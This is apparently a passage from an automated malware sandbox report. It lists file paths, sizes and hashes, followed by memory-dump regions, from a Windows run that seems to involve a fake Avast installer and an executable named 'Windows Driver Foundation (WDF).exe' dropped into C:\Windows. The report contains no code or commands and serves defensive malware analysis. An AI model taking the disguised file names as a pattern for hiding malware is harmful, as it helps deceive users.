5e45c20c11fe37c248933ab5c3d79429e58e1e57

SHA256
0b6717ea008477dd62815f6d1bf2ed61f8b624b1d5de080925e5103a1aaa1680

SHA512
60c56169b14041cbb1ff93818c64109597f6a8786830be9040239ac04d8737e98f25f8365c1b819c793a8c28b96965afd2d6ceb67c0631b4ba64f952d5ebd40e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\prefs.js

Filesize
7KB

MD5
00a98f2e8072c2f878e634e1cb54ed6a

SHA1
e4b6e7ecb87f8decee73187204dd8cc0e153c224

SHA256
84d7bafcb4612067add231a14f089c65748d7f7f11c43a419b45cab9faefc5d0

SHA512
7af9a38dc1606a110fc18033d040528c3148542b91aa93f978dfb7ffd5e6cb28a3c79d55ddae1a79c9a24ff380919b71d4d6ba9201200c8064f8d4cbbe025512

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
b6ce988440a71ae4e704aaf5258cfb93

SHA1
699d426f1ada08325dd21f5e5602133705532482

SHA256
9657df843f66e0675b148a05d9075080947bd22ee4964c3da3baf68351f74465

SHA512
b348de35e40f9518be14a3753a0e22d498d6452ac37246293ac709a0f4207ca1c7ac63fef6910535ded9894a47b923925ff1d156d2a8087f3b052c198ff283c4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
2e1423f69635ae396c6b597bf56c899a

SHA1
f3a0e7241ae994eeef9fdfdda67f9234dcd5274a

SHA256
2e67585cfedcca003d51f3b9396ad11d4a9c485d64f7d338b13af93664d2ca6d

SHA512
6fc7ab183f7ea8edde535a4f6c29f155e1a5dba1e370e8793ff46c9baeeb77e313bb9cdf25a18bff11b83605bb9db1fea1463883dd6e8ac60ca18bf31997b72a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
2KB

MD5
e81530cb3f00476ed83e18947f8c1c5e

SHA1
f34a4fc69ac445b640a6997a14e5d47e4b1d1d88

SHA256
9c3a517d4277877b635b39ad1bcf5e2b79554fce3c9863a82de397850b535f33

SHA512
680ef5ae6d1bad680dc7400fcec8f2f6fe1340405f64c0460ff42c3e66adcb99336c10967810578c99a32bd1eb819bfdaf0cf523f123d66dc965d1a9a4cae430

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
9b9db433fdf069f78e1d8eb1e1729e1d

SHA1
a5380b1e87e5ad4c3b80d1dc2198a80c39e6332f

SHA256
489e7ca5b9070d93f0cb421340583da2078bbaae8f925696446e845ec1727d81

SHA512
b0a34adb2a947f7640747ab34f27912e70e93a281dfdc8778ee46a992f6df1dfd559b9832e8e975e5822744cb5ae96fb47c510bf8f42c2b0f570eed6c948875c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
192KB

MD5
8322671eef35639482d4be20a1d285af

SHA1
adc93ed712af0f7c7b356fbd794f13786768ae1e

SHA256
a654af35c24ede4ab06e7a52c5baa889a576ee422fe852b07a390def8cdf6c5a

SHA512
10e87a30eb6f97dae74b695310b3c84c0327b8d045c58a3fa826245589bca2eb01f42b6a065016064372e443e21d424e97fcb5ca15111215c6a5b089ddf03e6d

Download Submit
C:\Users\Admin\Downloads\avast_premium_security_setup_offline.mzjBZYYD.exe.part

Filesize
120KB

MD5
f40d00b6df622dcf434c6c37e92606a3

SHA1
5d70e05ec00c62f946d3cfb00fed6c32a7a37f2b

SHA256
cdc7bba3a60de1fe5fe96c7c3b71885803e268287625d6f6c240db9c7000466b

SHA512
8e55bdd5333a4fcb520552f5fe6fa3d9fcbfbc38b9782471e6bfaffe639977bdf8af286622d27e57977ee1f173e2b7b1bd995549c5e12636574a89154ab1cfc2

Download Submit
C:\Windows\MSVCP140.dll

Filesize
436KB

MD5
3e992e3412b8067cd215b52e6f906b1a

SHA1
4aaff9d969d558d355954131b88b1c250aed5d15

SHA256
c3838cb309a101ca41064358ac65010610064f12aa3d341ea15c4b95e8d525c6

SHA512
b2c92e710c65cfa2ca4a1fd7da9bfee521e450a63ac9070a8524c2f3abfb9ebf06b6567d650c7c69e2ec2066057b61ee4f1bf39ef6ff66e483c1b445883834f9

Download Submit
C:\Windows\Qt5Core.dll

Filesize
4.6MB

MD5
7a97bfe411691baecb264c16f4ae24df

SHA1
648ba0d9abf2ff0dbca37f5615090a7f481268ae

SHA256
23fcd971ba4f32e5ffb60e3603bb145f7094fef360392caabc42d95b5d418f8e

SHA512
c7501a5049f830ef88e2b46eff59588eb4e8239d1e96ee585513adef1f15506d870960b2667ae816032734bef0d55ce034b601b2e1f7e7181c1f4c18d2622c45

Download Submit
C:\Windows\Qt5Gui.dll

Filesize
4.7MB

MD5
057e7d316770a407977569461a69f5d9

SHA1
6babc7d9a428cf2bc977875f4df0d0db303063d6

SHA256
e6005d3498d0e500b2b666554040309df20a5eebc941909ec3ef3fd1e3ac8f62

SHA512
d8bbb2918cfae5745326295c627f244e47b31bf1f1282dccd8b49ef06dc657cd8cadfdf02de9f5a68be86a797a2182df41fec73db7a141c479d999259e4dfe07

Download Submit
C:\Windows\Qt5Network.dll

Filesize
944KB

MD5
8a6687a0612280bde7ed3e2b81a69230

SHA1
203652a125e8b646269befa31fc1905906ca5244

SHA256
c406b7bc74107fb8419da7e2a8c67e47a331d5a54baca94257bade86ce061e24

SHA512
f72b3a1b55c7236a1ef448c4a3e2326a51441b75e699972ae2d614a1c47c7a185419aabb36c8f787b32ed021eee1142bd52e18733a4c4ed2a64c4b76f188baea

Download Submit
C:\Windows\Qt5Qml.dll

Filesize
2.6MB

MD5
bbb5685caf04f702c53ff9eaa23b6b2f

SHA1
9400b05f6f3be0dfb80a8b3ca34c1bd04e24e8b0

SHA256
3534d375b64359b83b3bc86cbdd5d380de160cddb7e31dfd4a0316c68b9d01e1

SHA512
83fe80d36b8cea368227c590a2b859d4a9ca1bb350bcfcff871ff8d002f329ef868b403c8f2d7812bcc763abcc4edef2826ada178166c4285b91ffd0a0472546

Download Submit
C:\Windows\Qt5Quick.dll

Filesize
2.7MB

MD5
e6f97c3e22dc643fceeb94b7a1d76780

SHA1
872767b11cd26589bf01378244af6511cf08c781

SHA256
4bc969d51032bb1ca597945b97d0673367e2a0e887989c1d60b3347373802d66

SHA512
44f71d339de28877befb79149702c9cfabf0e7a40e334d71422e57fe2218582a35d6946e9f8e229963b320cab12bcfebe70741102ae9c8cdd29ebf52483e15b5

Download Submit
C:\Windows\Qt5Svg.dll

Filesize
264KB

MD5
8144b3e3430d8ac5d42fcfe49e601722

SHA1
dcac61a2e8a6bacb9c5e7a56e5e6a9b5259e485f

SHA256
d8b65260e9accf0c33ad8b5bbfdbbea0678a00d481e2b0a9ed2c92baa096ec80

SHA512
2978b1c12aefe39a07dad59e058733caf29a5f054824430f232e4d852123811267b16dff052600e37bb15d4086fbd73e3286d261e6b8bb1ca34720ce7ac567cb

Download Submit
C:\Windows\Qt5Widgets.dll

Filesize
4.3MB

MD5
fa4826e180cee08c46990bea2cb430a5

SHA1
4a43dd9f699a8ec38a5b3104bc7eac8ee4c51da7

SHA256
173299de94585b38e872ce40fdaa84b42617b9766812d9772ec954832a197dc7

SHA512
685a6e314025804290a0c6cf214eb4f80c93344fc353767e8bc8363df4bf09e8fb91dfb012cfdd93017b34006ca95adb92b762ea511df5a299780550c9bdd2d7

Download Submit
C:\Windows\QtGraphicalEffects\qmldir

Filesize
985B

MD5
7ad5f1f783e4a428d5d39e92fe623714

SHA1
e793ac0c9f3b24b823c6bf79bf96401b39ed8ec1

SHA256
b11f92e5b896191d58d53c3c32e94efe04028437d9091c89f8e77fbc7e817a9a

SHA512
bfe958c8071f7161991814422f531c03d3467cea8b0791bb1a679e684cb96c9fc524646ed6ec7f1b02c3dd64d94ffcbf57df656e07f51bc4eaf4e3736e0b3f0a

Download Submit
C:\Windows\QtGraphicalEffects\qtgraphicaleffectsplugin.dll

Filesize
21KB

MD5
d3ce0bdd815265aacae520274ef53277

SHA1
ccc484682e404de56a4ebe974d4b92966f70893d

SHA256
de6b3c07e6f064a9ec33b8ad9d87c8a694e34855ea978afb53cbc486a018b760

SHA512
01266223c51c986d7ac21e52c96f7e9afd64a4552dd64c6bd3cd6a697f65115de686d51f141f8ee67dcc7fa8cb56525fb806fe88081487e53bafb5e56933c96d

Download Submit
C:\Windows\QtQuick.2\qmldir

Filesize
106B

MD5
5c874d6f5f0f7a13a8321df7b7d92c4c

SHA1
f78d24f90117de489ea3656d7b25d04a684f9c66

SHA256
6edba83498e1485ce6c41f06addfbfe613389b8c4c38cf93bfc69fa0494fcbc9

SHA512
3971ee967be123feed7212ca77428cd67cd27d34140c29fb51bceb6b8b5ecf8ad0540068de621a7ef3a635ec8cb41fa55f98ea183e475ca56fd2515059b7085c

Download Submit
C:\Windows\QtQuick.2\qtquick2plugin.dll

Filesize
21KB

MD5
140626a1ca38580322fe143ce86a629f

SHA1
7e4a11f01cd441ffd9e1ad1dc3c6ce8aa51b97bc

SHA256
c42e96448b4b1c7d8186bc5664bd312f29f5db40aed04a6907156c4fb31c6bdc

SHA512
d569bfca8dd215da4140b6c8f8be40cedeba1660c0bc4b5239f21b8a1fa7c5d576f15f246a30ba534ea062c357fe03af2ba751251bcb6da52be82572add86392

Download Submit
C:\Windows\QtQuick\Layouts\qmldir

Filesize
125B

MD5
b95302e6fb7d93890f8cc17a92ae5e71

SHA1
afaaa2e4e19605d35d84a4d488b989180a3a6200

SHA256
36e294e1ea20fc9ee86fa7fc301aa5fdff5946d2f531c1d18e7056cf8c355384

SHA512
811d98281775a1f668a7dcf58966ddfed8fc9073f1e5d4c7bd1c77db9ace46f6f7893a37d42ac1aff97d4e2c789264c7d377fb254943cb291638988acb5d63c8

Download Submit
C:\Windows\QtQuick\Layouts\qquicklayoutsplugin.dll

Filesize
75KB

MD5
861a792411273194cc063ec4ffe97495

SHA1
2369ef372b7c6d352414dacc69f3d67d34c59a32

SHA256
699a531ec615bf8fda5188ba5085ced0d678b15b412ff034e5a75288df5bed56

SHA512
e36a16d2c974e6984bb1035c9ab32ee5c0d1691200d59ade574bd369a64e6b1638bacc5f17a5279e899d68cc5226267239d8575b8c75bfe41f655785462a4cd3

Download Submit
C:\Windows\QtQuick\Window.2\qmldir

Filesize
117B

MD5
4a45db3b32fa45dc51ea18e87f26fe37

SHA1
417f901bde07aa0487df3726a808182dbbb97552

SHA256
d91e660e8bdfcfc661709eb829ba2dfddecba34cae4bf6135f51d78d28659786

SHA512
6ae16a9840095354c3121f9824703bd78f0dbb982228031d6211cc5d97ea97bb4d66b9f7e1fb4e34bec258017501540a43b8d2c85022c0884ab6e219e404c091

Download Submit
C:\Windows\QtQuick\Window.2\windowplugin.dll

Filesize
21KB

MD5
870a707e19c65fee1cb9d66b0a2b83d3

SHA1
3c0f12cf754735d3de570b923e0f873232e441e7

SHA256
2f67efaba0c88243a08570c7a23f4934c85070d451b5ff7517d1ea890fb46372

SHA512
20024a02f68f5796da7d3388a4b46d6b6bc84b41fbb0c855b16e449150c50504d502cf2209e63aaa90112b560c75f6a13dc84f6f2fa4e8553cf26f27652dbc7b

Download Submit
C:\Windows\System32\curl.exe

Filesize
4.4MB

MD5
6f2fb9e6c8f9093657e513f40e3522c4

SHA1
cb93fbd5ce1b63bc15b25457a7fc461723a74a22

SHA256
386f29b6f3c568e653ec32ab5107375a19c0b61c0fe7d7a04ce06aae747bdd9f

SHA512
95f6de326af0eab5d532d1486669ce93026aaa57c42fa9c88fc29be8d4249881c51bb42785b347f893feb3b9454b4acbd46d1901635436d348adfa96c7a651d6

Download Submit
C:\Windows\System32\curl.exe

Filesize
4.4MB

MD5
6f2fb9e6c8f9093657e513f40e3522c4

SHA1
cb93fbd5ce1b63bc15b25457a7fc461723a74a22

SHA256
386f29b6f3c568e653ec32ab5107375a19c0b61c0fe7d7a04ce06aae747bdd9f

SHA512
95f6de326af0eab5d532d1486669ce93026aaa57c42fa9c88fc29be8d4249881c51bb42785b347f893feb3b9454b4acbd46d1901635436d348adfa96c7a651d6

Download Submit
C:\Windows\System32\curl.exe

Filesize
4.4MB

MD5
6f2fb9e6c8f9093657e513f40e3522c4

SHA1
cb93fbd5ce1b63bc15b25457a7fc461723a74a22

SHA256
386f29b6f3c568e653ec32ab5107375a19c0b61c0fe7d7a04ce06aae747bdd9f

SHA512
95f6de326af0eab5d532d1486669ce93026aaa57c42fa9c88fc29be8d4249881c51bb42785b347f893feb3b9454b4acbd46d1901635436d348adfa96c7a651d6

Download Submit
C:\Windows\System32\curl.exe

Filesize
4.4MB

MD5
6f2fb9e6c8f9093657e513f40e3522c4

SHA1
cb93fbd5ce1b63bc15b25457a7fc461723a74a22

SHA256
386f29b6f3c568e653ec32ab5107375a19c0b61c0fe7d7a04ce06aae747bdd9f

SHA512
95f6de326af0eab5d532d1486669ce93026aaa57c42fa9c88fc29be8d4249881c51bb42785b347f893feb3b9454b4acbd46d1901635436d348adfa96c7a651d6

Download Submit
C:\Windows\System32\curl.exe

Filesize
4.4MB

MD5
6f2fb9e6c8f9093657e513f40e3522c4

SHA1
cb93fbd5ce1b63bc15b25457a7fc461723a74a22

SHA256
386f29b6f3c568e653ec32ab5107375a19c0b61c0fe7d7a04ce06aae747bdd9f

SHA512
95f6de326af0eab5d532d1486669ce93026aaa57c42fa9c88fc29be8d4249881c51bb42785b347f893feb3b9454b4acbd46d1901635436d348adfa96c7a651d6

Download Submit
C:\Windows\System32\curl.exe

Filesize
4.4MB

MD5
6f2fb9e6c8f9093657e513f40e3522c4

SHA1
cb93fbd5ce1b63bc15b25457a7fc461723a74a22

SHA256
386f29b6f3c568e653ec32ab5107375a19c0b61c0fe7d7a04ce06aae747bdd9f

SHA512
95f6de326af0eab5d532d1486669ce93026aaa57c42fa9c88fc29be8d4249881c51bb42785b347f893feb3b9454b4acbd46d1901635436d348adfa96c7a651d6

Download Submit
C:\Windows\System32\curl.exe

Filesize
4.4MB

MD5
6f2fb9e6c8f9093657e513f40e3522c4

SHA1
cb93fbd5ce1b63bc15b25457a7fc461723a74a22

SHA256
386f29b6f3c568e653ec32ab5107375a19c0b61c0fe7d7a04ce06aae747bdd9f

SHA512
95f6de326af0eab5d532d1486669ce93026aaa57c42fa9c88fc29be8d4249881c51bb42785b347f893feb3b9454b4acbd46d1901635436d348adfa96c7a651d6

Download Submit
C:\Windows\VCRUNTIME140.dll

Filesize
80KB

MD5
95e17fbff059ac1e157437d618c7fdd9

SHA1
2b8d1e9bfbab2c8e47f8d4b3786218ba03365148

SHA256
cf37047208765bdbf63db7d637213cec9df427283977beb99afed87efdd67df5

SHA512
bacf10230e52d49ca37833a822436b84f728b3bbc468be83fec5225797e2a55b33f793314ec768ff69efa668bc0a542ed8f8552d60dd544ed09726f2a3f461bc

Download Submit
C:\Windows\Windows Driver Foundation (WDF).exe

Filesize
1.5MB

MD5
52b3a4bf653a25997a846521531f8eb3

SHA1
b3a0aa35b1efed9274b243c470bb3183871b3c29

SHA256
6660ea3b13b995c05bef8f9ee748573f7b8438f6bfeaca14840129e674e46b9f

SHA512
35f9790b2497482618888a5652c359a7735bacf323b45e64e070864a3ce43b7deebaecde7b9ce6048c864b7087655c3dd4f545f3e5be2d47b104a167d65b5a6b

Download Submit
C:\Windows\Windows Driver Foundation (WDF).exe

Filesize
1.5MB

MD5
52b3a4bf653a25997a846521531f8eb3

SHA1
b3a0aa35b1efed9274b243c470bb3183871b3c29

SHA256
6660ea3b13b995c05bef8f9ee748573f7b8438f6bfeaca14840129e674e46b9f

SHA512
35f9790b2497482618888a5652c359a7735bacf323b45e64e070864a3ce43b7deebaecde7b9ce6048c864b7087655c3dd4f545f3e5be2d47b104a167d65b5a6b

Download Submit
C:\Windows\iconengines\qsvgicon.dll

Filesize
36KB

MD5
9db47e8a17bb81d9e1bac8a7898c213a

SHA1
1e3fb0f4e6d994810b5563d3edbb505a29081fc6

SHA256
c319a46a33d0633fbf17106b4c7efd0b482f7fc2674cb1c7b1e7e23bbe7db559

SHA512
e29b525fe9bde94e7f0567fb8a2f4a57949b3ef127cc7214c19e383e626231afe1005194fb259fd4067e5df2928cc481d1b5e6c04b0b2ac0ba812466cafb503d

Download Submit
C:\Windows\imageformats\qgif.dll

Filesize
31KB

MD5
b2e570e7c101ca65abe47369ab296a58

SHA1
0c8ffa0d9837eb01457fc86ae7b675921de0ea84

SHA256
7146267928eb0ce744004d4d21e5c5488c2b5fda1b3a5bf42a713a523be6581c

SHA512
aa50d966f1bdad5ddc207891c14083b82a43fafeba1b46e80106833ef728f839bd0b311b03ef069a83965f05fea91cbc60822d1d3db7ba36e9ae174a3f8d9fed

Download Submit
C:\Windows\imageformats\qicns.dll

Filesize
38KB

MD5
87c3183dc060a321d04010bca342f167

SHA1
c876fd48062ed0236ba7b59002ce9725ef528e6d

SHA256
e6fc328f7d07f1951653774f3ddeab297520165c959ecff3f962ec54c5f6946c

SHA512
f98cd7466d8da1d887b9a396e196142ee3945f1b9df21e0e07745e5f5c7d8c66791ff9285dfc619f9c9be297b9fe514dbb9b4ec2df1a730cd0f5f87df39471c8

Download Submit
C:\Windows\imageformats\qjpeg.dll

Filesize
243KB

MD5
802d7bd91866042592f6b1f4472f5874

SHA1
ceea247abff51b1cf37906f74ff439b71158bc78

SHA256
7fac52d892fae66d26e2d5d8bb78fd1dc2d4fbf7c43952d8427fa4b25df3959c

SHA512
3c0cb3f5d19920b7db68672da178a8e02c0220cd6700d8edd810e138700694282af860e3a05d1ee8d064e4b2bdf2fae17dc7c0935c7555530171f189db1c7c41

Download Submit
C:\Windows\imageformats\qsvg.dll

Filesize
26KB

MD5
fa94bf82dfa9d31414086f780721b8f3

SHA1
8ef4df7cbf489735c57d0a04acde2a63024f13b9

SHA256
116638fb5eedb64a95a4e846e5e0b6f5467a46b5a59fe0be9d719006b03ad652

SHA512
c171bc5588d5d813ba21daf9572dd131d4cc6f24b5e4ab2091b8039f351ab24595e10aeb2448565e490796ebeee4860b9d3e4e76055f10b676c68d81d9e73883

Download Submit
C:\Windows\imageformats\qtga.dll

Filesize
26KB

MD5
d2543751020b1a74b89e17c726e31df3

SHA1
166f8feb4e44df5e0e4837f4aa6956cb0eb3a63d

SHA256
96ad2571c2f193d72c596343a0c2da70a325925c54a62c848f4e1af2c3ae21f8

SHA512
aece267abd7d4e059e2ab86775a022b2bcc55eca8cde9bf3b2be9d62eeb833d99b817416da1203952dd89f23167558369aefcd091084ecacbc7115f3df04d3eb

Download Submit
C:\Windows\imageformats\qtiff.dll

Filesize
332KB

MD5
05161127450c0abff3a6f6b01ab9dd5e

SHA1
aa6c1100a91d0efe2c45c4c9b6b24f5fdfd8aa64

SHA256
a53744c16e6ff0637c845629a354f389e9acc65d40682556537b9346c56f0929

SHA512
7b1c69d2d071c2819c7450cc4a565d41396cb1bf7d98e3317a36a5a3e769de8bc5d872932fc5caf9b64edea37c9dea00b250a0772048413ae8b7105032c3d709

Download Submit
C:\Windows\imageformats\qwbmp.dll

Filesize
25KB

MD5
9b26fbf8ed1277076e70884eab05f3b0

SHA1
a68bc4f69ac6bea902ab44e8f0a9c9c817c3f0a5

SHA256
2175d005525b120d5f86de7cbcdeffd280c795efa3cd185b64aab459035e83d7

SHA512
a2c2a2c792d12a0a8bfc22de899def2a09a6e9c8f1a54e1fe2ae921d0eaf8a0ddfbfecaf1fb7f86822a32fcd679ac0d19d24fc14c75dfa17834f17bfe61d882c

Download Submit
C:\Windows\imageformats\qwebp.dll

Filesize
411KB

MD5
4da1ead434bf1b4cb6bc7b98729fe8a4

SHA1
c75e04a1d119dab0dd676ca610e05cc729a69092

SHA256
bd5f59f72a0b42a00658d50967133181b41d203b429371541c7b4562ae52c903

SHA512
d2e29439a87488bfc15895f61365feb98a6a6dfa6ebcfdde6efd69d09968d362a16cca81629941d2e8cfd738c7950504f2e73d1e97ae74028a6bb647ca97c59c

Download Submit
C:\Windows\platforms\qwindows.dll

Filesize
1.1MB

MD5
574904cdc536c98bc39db80da7e7020f

SHA1
eaaa45bd16461c7347311d5091d67e5dc5f58dfa

SHA256
c238ef4544fe9e20ab28486f0eff4f950169ca8c824166c66da06e28f94f67b8

SHA512
7dd4aeb10ba5c38622ce575180ec3f188b57bd61b342f5d0826eac88c5b543bb41f7e6c5335797f7f02fee5a8bf9c3bd26c597117484f84fea0121ece295dc92

Download Submit
\Program Files (x86)\7-Zip\7z.dll

Filesize
1.2MB

MD5
a65e53c974a4e61728ecb632339a0978

SHA1
27e6ec4f8e34b40f1e08503245700c182b918ce9

SHA256
ca8ab5aeef734f24a3c58bf10b3f0152c2ea1329b02d2730448693df563b4c6a

SHA512
b029962f08867496cd3fd5e9af4b0703dae918e938aee759aeffbb4184ea6d3e81e0878ba8957e80d30db5d7b6fc8598e68918a4d16b3d010f31a2e16417593e

Download Submit
\Program Files (x86)\7-Zip\7z.dll

Filesize
1.2MB

MD5
a65e53c974a4e61728ecb632339a0978

SHA1
27e6ec4f8e34b40f1e08503245700c182b918ce9

SHA256
ca8ab5aeef734f24a3c58bf10b3f0152c2ea1329b02d2730448693df563b4c6a

SHA512
b029962f08867496cd3fd5e9af4b0703dae918e938aee759aeffbb4184ea6d3e81e0878ba8957e80d30db5d7b6fc8598e68918a4d16b3d010f31a2e16417593e

Download Submit
\Windows\QtGraphicalEffects\qtgraphicaleffectsplugin.dll

Filesize
21KB

MD5
d3ce0bdd815265aacae520274ef53277

SHA1
ccc484682e404de56a4ebe974d4b92966f70893d

SHA256
de6b3c07e6f064a9ec33b8ad9d87c8a694e34855ea978afb53cbc486a018b760

SHA512
01266223c51c986d7ac21e52c96f7e9afd64a4552dd64c6bd3cd6a697f65115de686d51f141f8ee67dcc7fa8cb56525fb806fe88081487e53bafb5e56933c96d

Download Submit
\Windows\QtQuick.2\qtquick2plugin.dll

Filesize
21KB

MD5
140626a1ca38580322fe143ce86a629f

SHA1
7e4a11f01cd441ffd9e1ad1dc3c6ce8aa51b97bc

SHA256
c42e96448b4b1c7d8186bc5664bd312f29f5db40aed04a6907156c4fb31c6bdc

SHA512
d569bfca8dd215da4140b6c8f8be40cedeba1660c0bc4b5239f21b8a1fa7c5d576f15f246a30ba534ea062c357fe03af2ba751251bcb6da52be82572add86392

Download Submit
\Windows\QtQuick\Layouts\qquicklayoutsplugin.dll

Filesize
75KB

MD5
861a792411273194cc063ec4ffe97495

SHA1
2369ef372b7c6d352414dacc69f3d67d34c59a32

SHA256
699a531ec615bf8fda5188ba5085ced0d678b15b412ff034e5a75288df5bed56

SHA512
e36a16d2c974e6984bb1035c9ab32ee5c0d1691200d59ade574bd369a64e6b1638bacc5f17a5279e899d68cc5226267239d8575b8c75bfe41f655785462a4cd3

Download Submit
\Windows\QtQuick\Window.2\windowplugin.dll

Filesize
21KB

MD5
870a707e19c65fee1cb9d66b0a2b83d3

SHA1
3c0f12cf754735d3de570b923e0f873232e441e7

SHA256
2f67efaba0c88243a08570c7a23f4934c85070d451b5ff7517d1ea890fb46372

SHA512
20024a02f68f5796da7d3388a4b46d6b6bc84b41fbb0c855b16e449150c50504d502cf2209e63aaa90112b560c75f6a13dc84f6f2fa4e8553cf26f27652dbc7b

Download Submit
\Windows\imageformats\qgif.dll

Filesize
31KB

MD5
b2e570e7c101ca65abe47369ab296a58

SHA1
0c8ffa0d9837eb01457fc86ae7b675921de0ea84

SHA256
7146267928eb0ce744004d4d21e5c5488c2b5fda1b3a5bf42a713a523be6581c

SHA512
aa50d966f1bdad5ddc207891c14083b82a43fafeba1b46e80106833ef728f839bd0b311b03ef069a83965f05fea91cbc60822d1d3db7ba36e9ae174a3f8d9fed

Download Submit
\Windows\imageformats\qicns.dll

Filesize
38KB

MD5
87c3183dc060a321d04010bca342f167

SHA1
c876fd48062ed0236ba7b59002ce9725ef528e6d

SHA256
e6fc328f7d07f1951653774f3ddeab297520165c959ecff3f962ec54c5f6946c

SHA512
f98cd7466d8da1d887b9a396e196142ee3945f1b9df21e0e07745e5f5c7d8c66791ff9285dfc619f9c9be297b9fe514dbb9b4ec2df1a730cd0f5f87df39471c8

Download Submit
\Windows\imageformats\qjpeg.dll

Filesize
243KB

MD5
802d7bd91866042592f6b1f4472f5874

SHA1
ceea247abff51b1cf37906f74ff439b71158bc78

SHA256
7fac52d892fae66d26e2d5d8bb78fd1dc2d4fbf7c43952d8427fa4b25df3959c

SHA512
3c0cb3f5d19920b7db68672da178a8e02c0220cd6700d8edd810e138700694282af860e3a05d1ee8d064e4b2bdf2fae17dc7c0935c7555530171f189db1c7c41

Download Submit
\Windows\imageformats\qsvg.dll

Filesize
26KB

MD5
fa94bf82dfa9d31414086f780721b8f3

SHA1
8ef4df7cbf489735c57d0a04acde2a63024f13b9

SHA256
116638fb5eedb64a95a4e846e5e0b6f5467a46b5a59fe0be9d719006b03ad652

SHA512
c171bc5588d5d813ba21daf9572dd131d4cc6f24b5e4ab2091b8039f351ab24595e10aeb2448565e490796ebeee4860b9d3e4e76055f10b676c68d81d9e73883

Download Submit
\Windows\imageformats\qtga.dll

Filesize
26KB

MD5
d2543751020b1a74b89e17c726e31df3

SHA1
166f8feb4e44df5e0e4837f4aa6956cb0eb3a63d

SHA256
96ad2571c2f193d72c596343a0c2da70a325925c54a62c848f4e1af2c3ae21f8

SHA512
aece267abd7d4e059e2ab86775a022b2bcc55eca8cde9bf3b2be9d62eeb833d99b817416da1203952dd89f23167558369aefcd091084ecacbc7115f3df04d3eb

Download Submit
\Windows\imageformats\qtiff.dll

Filesize
332KB

MD5
05161127450c0abff3a6f6b01ab9dd5e

SHA1
aa6c1100a91d0efe2c45c4c9b6b24f5fdfd8aa64

SHA256
a53744c16e6ff0637c845629a354f389e9acc65d40682556537b9346c56f0929

SHA512
7b1c69d2d071c2819c7450cc4a565d41396cb1bf7d98e3317a36a5a3e769de8bc5d872932fc5caf9b64edea37c9dea00b250a0772048413ae8b7105032c3d709

Download Submit
\Windows\imageformats\qwbmp.dll

Filesize
25KB

MD5
9b26fbf8ed1277076e70884eab05f3b0

SHA1
a68bc4f69ac6bea902ab44e8f0a9c9c817c3f0a5

SHA256
2175d005525b120d5f86de7cbcdeffd280c795efa3cd185b64aab459035e83d7

SHA512
a2c2a2c792d12a0a8bfc22de899def2a09a6e9c8f1a54e1fe2ae921d0eaf8a0ddfbfecaf1fb7f86822a32fcd679ac0d19d24fc14c75dfa17834f17bfe61d882c

Download Submit
\Windows\imageformats\qwebp.dll

Filesize
411KB

MD5
4da1ead434bf1b4cb6bc7b98729fe8a4

SHA1
c75e04a1d119dab0dd676ca610e05cc729a69092

SHA256
bd5f59f72a0b42a00658d50967133181b41d203b429371541c7b4562ae52c903

SHA512
d2e29439a87488bfc15895f61365feb98a6a6dfa6ebcfdde6efd69d09968d362a16cca81629941d2e8cfd738c7950504f2e73d1e97ae74028a6bb647ca97c59c

Download Submit
\Windows\platforms\qwindows.dll

Filesize
1.1MB

MD5
574904cdc536c98bc39db80da7e7020f

SHA1
eaaa45bd16461c7347311d5091d67e5dc5f58dfa

SHA256
c238ef4544fe9e20ab28486f0eff4f950169ca8c824166c66da06e28f94f67b8

SHA512
7dd4aeb10ba5c38622ce575180ec3f188b57bd61b342f5d0826eac88c5b543bb41f7e6c5335797f7f02fee5a8bf9c3bd26c597117484f84fea0121ece295dc92

Download Submit
memory/420-406-0x000001EBAE340000-0x000001EBAE350000-memory.dmp

Filesize
64KB

Download
memory/420-2823-0x000001EBAE340000-0x000001EBAE350000-memory.dmp

Filesize
64KB

Download
memory/420-1964-0x000001EBAE340000-0x000001EBAE350000-memory.dmp

Filesize
64KB

Download
memory/420-1959-0x000001EBAE340000-0x000001EBAE350000-memory.dmp

Filesize
64KB

Download
memory/420-2835-0x00007FF9532C0000-0x00007FF953CAC000-memory.dmp

Filesize
9.9MB

Download
memory/420-458-0x00007FF9532C0000-0x00007FF953CAC000-memory.dmp

Filesize
9.9MB

Download
memory/420-403-0x00007FF9532C0000-0x00007FF953CAC000-memory.dmp

Filesize
9.9MB

Download
memory/420-405-0x000001EBAE340000-0x000001EBAE350000-memory.dmp

Filesize
64KB

Download
memory/660-358-0x0000020FC66A0000-0x0000020FC66B0000-memory.dmp

Filesize
64KB

Download
memory/660-380-0x00007FF9532C0000-0x00007FF953CAC000-memory.dmp

Filesize
9.9MB

Download
memory/660-371-0x0000020FC66A0000-0x0000020FC66B0000-memory.dmp

Filesize
64KB

Download
memory/660-360-0x0000020FC6960000-0x0000020FC69D6000-memory.dmp

Filesize
472KB

Download
memory/660-356-0x0000020FC66A0000-0x0000020FC66B0000-memory.dmp

Filesize
64KB

Download
memory/660-355-0x00007FF9532C0000-0x00007FF953CAC000-memory.dmp

Filesize
9.9MB

Download
memory/660-354-0x0000020FC67B0000-0x0000020FC67D2000-memory.dmp

Filesize
136KB

Download
memory/1956-386-0x0000000000400000-0x0000000000494000-memory.dmp

Filesize
592KB

Download
memory/5140-2868-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/5140-2881-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

Filesize
4KB

Download
memory/5140-2817-0x0000000003130000-0x0000000003134000-memory.dmp

Filesize
16KB

Download
memory/5140-2852-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/5140-2854-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
